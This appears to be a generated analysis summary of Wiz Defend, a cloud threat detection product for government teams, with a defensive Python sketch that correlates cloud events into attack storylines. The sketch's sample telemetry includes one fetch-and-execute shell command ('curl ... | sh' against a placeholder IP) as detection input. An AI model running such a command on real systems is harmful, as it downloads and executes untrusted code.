Full Report
Wiz Defend is now part of Wiz for Gov, giving public sector teams cloud runtime threat detection with full context to accelerate detection, investigation, and remediation of threats with precision.
Analysis Summary
# Tool/Technique: Wiz Defend
## Overview
Wiz Defend is a component of Wiz for Gov, designed to modernize cloud threat detection, investigation, and response for government teams and organizations with FedRAMP requirements. Its primary goal is to filter out alert noise, surface root causes quickly, and provide context to understand the blast radius and impact of threats in complex cloud environments.
## Technical Details
- Type: Tool/Platform Feature (Cloud Threat Detection and Response)
- Platform: Cloud environments (the article does not name specific cloud providers; it describes the control-plane, identity, data, workload-runtime and network layers generically)
- Capabilities: Ingests and analyzes external logs, filters noise/duplicates, groups connected events into high-fidelity threats, correlates signals across cloud control plane, identity, data, workload runtime, and network layers to generate unified attack storylines.
- First Seen: Not explicitly mentioned, but announced as part of Wiz for Gov's general availability offering in the context of the article.
## MITRE ATT&CK Mapping
The article states that detections are aligned to cloud-native TTPs but lists no technique (T####) or tactic (TA####) identifiers. Its coverage should be read as spanning the ATT&CK tactics an attacker traverses in a cloud estate: **Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, and Impact**.
No specific mapping is supported by the text, so none is asserted here. Note that ATT&CK has no "Detection and Response" tactic: the detection and response functions described below are defensive capabilities layered over the matrix, not ATT&CK entries.
## Functionality
### Core Capabilities
- **Noise Reduction:** Continuously ingests telemetry, suppresses false positives, and groups related events to provide high-fidelity detections.
- **Contextual Correlation:** Analyzes signals across Infrastructure, Identity, Data, Workload Runtime, and Control Plane layers.
- **Accelerated Investigation:** Creates visual attack storylines connecting events across layers (identity, runtime, network, resources, control plane) to trace attacker movement and determine root cause rapidly, aiming to reduce MTTR from hours to minutes.
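The correlation described in the bullets above (de-duplicate raw events, link them through shared identities, split by time window, rank by how many layers a cluster spans, and hand the analyst a time-ordered storyline with a root cause and a containment suggestion) can be sketched in a few dozen lines. The following is an added illustration, not Wiz code; the event records, field names, layer labels and the `isolate`/`disable new keys` action strings are constructed for the example and do not correspond to any Wiz schema or API.

```python
"""Toy cross-layer correlation: turn raw cloud events into attack storylines.

Added example, not vendor code. Records are constructed and loosely modelled
on cloud audit logs, identity logs and a runtime sensor; the schema is invented.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone

IDENTITY_PREFIXES = ("user/", "role/")   # resources that are themselves principals

# Constructed sample telemetry (not real logs). Note the duplicate delivery of
# the CreateAccessKey event and the benign, unrelated activity by user/alice.
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T10:00:01Z", "layer": "control_plane", "principal": "role/ci-deployer",
     "action": "sts:AssumeRole", "resource": "role/ci-deployer", "src_ip": "203.0.113.5"},
    {"ts": "2024-05-01T10:00:05Z", "layer": "identity", "principal": "role/ci-deployer",
     "action": "iam:CreateAccessKey", "resource": "user/backup-svc", "src_ip": "203.0.113.5"},
    {"ts": "2024-05-01T10:00:05Z", "layer": "identity", "principal": "role/ci-deployer",
     "action": "iam:CreateAccessKey", "resource": "user/backup-svc", "src_ip": "203.0.113.5"},
    {"ts": "2024-05-01T10:02:30Z", "layer": "workload_runtime", "principal": "role/ci-deployer",
     "action": "exec:/bin/sh -c 'curl http://203.0.113.9/x | sh'", "resource": "pod/web-7c9d", "src_ip": None},
    {"ts": "2024-05-01T10:03:10Z", "layer": "data", "principal": "user/backup-svc",
     "action": "s3:GetObject", "resource": "bucket/customer-exports", "src_ip": "203.0.113.9"},
    {"ts": "2024-05-01T10:15:00Z", "layer": "control_plane", "principal": "user/alice",
     "action": "ec2:DescribeInstances", "resource": "*", "src_ip": "198.51.100.7"},
    {"ts": "2024-05-01T10:15:02Z", "layer": "control_plane", "principal": "user/alice",
     "action": "ec2:DescribeInstances", "resource": "*", "src_ip": "198.51.100.7"},
]


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


class UnionFind:
    """Links principals that touch each other (e.g. a role minting a key for a user)."""
    def __init__(self):
        self.parent = {}

    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]   # path halving
            x = self.parent[x]
        return x

    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def dedupe(events):
    """Drop exact re-deliveries of the same event (noise reduction)."""
    seen, out = set(), []
    for e in events:
        key = (e["ts"], e["layer"], e["principal"], e["action"], e["resource"])
        if key not in seen:
            seen.add(key)
            out.append(e)
    return out


def suggest_containment(evs):
    """Hypothetical response actions keyed off what the storyline contains."""
    actions = set()
    for e in evs:
        if e["layer"] == "workload_runtime":
            actions.add(f"isolate {e['resource']}")
        if e["action"] == "iam:CreateAccessKey":
            actions.add(f"disable new keys on {e['resource']}")
    return sorted(actions)


def summarize(evs):
    layers = sorted({e["layer"] for e in evs})
    identities = {e["principal"] for e in evs}
    identities |= {e["resource"] for e in evs if e["resource"].startswith(IDENTITY_PREFIXES)}
    return {
        "root_cause": evs[0],              # earliest event in the cluster is the entry point
        "identities": sorted(identities),
        "layers": layers,
        "events": evs,
        "severity": "high" if len(layers) >= 3 else "low",   # cross-layer == high fidelity
        "actions": suggest_containment(evs),
    }


def build_storylines(events, window_minutes=30):
    """Group events by linked identity, then split each group on time gaps."""
    events = sorted(dedupe(events), key=lambda e: parse_ts(e["ts"]))
    uf = UnionFind()
    for e in events:
        uf.find(e["principal"])
        if e["resource"].startswith(IDENTITY_PREFIXES):
            uf.union(e["principal"], e["resource"])
    groups = defaultdict(list)
    for e in events:
        groups[uf.find(e["principal"])].append(e)
    storylines = []
    for evs in groups.values():
        current = [evs[0]]
        for prev, e in zip(evs, evs[1:]):
            if parse_ts(e["ts"]) - parse_ts(prev["ts"]) > timedelta(minutes=window_minutes):
                storylines.append(summarize(current))
                current = []
            current.append(e)
        storylines.append(summarize(current))
    return storylines


if __name__ == "__main__":
    for s in build_storylines(SAMPLE_EVENTS):
        print(s["severity"], s["layers"], s["identities"], s["actions"])
        for e in s["events"]:
            print("   ", e["ts"], e["layer"], e["principal"], e["action"], "->", e["resource"])
```

On the constructed input this yields one high-severity storyline (role assumption, key creation for a second user, a shell execution in a pod, and a bucket read by that second user, spanning four layers, with the role assumption as root cause) and one low-severity cluster for the unrelated `DescribeInstances` calls. The identity-linking step is what joins the `user/backup-svc` data access back to `role/ci-deployer`; a per-principal grouping alone would have split the story in two.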
### Advanced Features
- **eBPF-based Wiz Sensor:** Provides deep runtime visibility across hosts and containers, tracking activity from code to runtime. The article says this works without privileged access to the monitored workloads; note that loading eBPF programs on a node still requires kernel capabilities (CAP_BPF and CAP_PERFMON, or CAP_SYS_ADMIN on kernels before 5.8), so the sensor's own deployment context should be reviewed as part of the rollout.
- **Code-to-Cloud Tracing:** Connects issues found early in the development lifecycle (e.g., exposed secrets in code) to actual runtime compromises in production (e.g., identity compromise).
- **Automated Response:** Allows response policies to be triggered via the Wiz Sensor for real-time containment (e.g., isolating a workload or alerting SIEM/SOAR).
- **Compliance Support:** Aids in achieving and maintaining FedRAMP compliance by supporting NIST SP 800-53 controls such as SI-4 (System Monitoring) and AU-6 (Audit Record Review, Analysis, and Reporting) through continuous monitoring and evidence generation for a continuous Authority to Operate (cATO).
## Indicators of Compromise
This tool is a defensive product: it ingests and correlates indicators rather than carrying any. The description therefore provides no offensive IoCs.
- File Hashes: N/A (Defensive Analysis)
- File Names: N/A (Defensive Analysis)
- Registry Keys: N/A (Defensive Analysis)
- Network Indicators: N/A (the tool ingests network telemetry and emits threat narratives; the description lists no explicit network indicators)
- Behavioral Indicators: Ingestion and analysis of runtime activity, API calls, identity usage, and workload interactions that constitute cloud-native TTPs.
## Associated Threat Actors
The article names no specific threat actors. The tool targets adversaries using cloud-native TTPs that evade endpoint-centric detection, with **Federal agencies** and organizations adhering to **FedRAMP** standards as the stated defender audience.
## Detection Methods
Wiz Defend utilizes:
- **Behavioral Analytics:** To group and identify meaningful security events.
- **Threat Intelligence:** Incorporation of thousands of built-in detections for cloud-specific TTPs and real-time threat intelligence feeds.
- **Rule-based detection:** Built-in detections mapped to known cloud TTPs (the article does not state whether these are static signatures or behavioral rules).
## Mitigation Strategies
- **Real-time Containment:** Triggering response policies (e.g., workload isolation) based on runtime detections to stop active threats.
- **Root Cause Remediation:** Pinpointing the origin of the threat (e.g., developers fixing infrastructure drift or misconfigurations) to prevent recurrence.
- **Continuous Monitoring:** Utilizing the Wiz Sensor for continuous visibility across runtime environments.
- **Proactive Hardening:** Detecting issues early in the development lifecycle (Wiz Code integration implied) to minimize the attack surface before deployment.
## Related Tools/Techniques
- Wiz for Gov (The overarching platform)
- Wiz Sensor (eBPF-based runtime visibility component)
- Wiz Code (Implied tool for secure software supply chain visibility)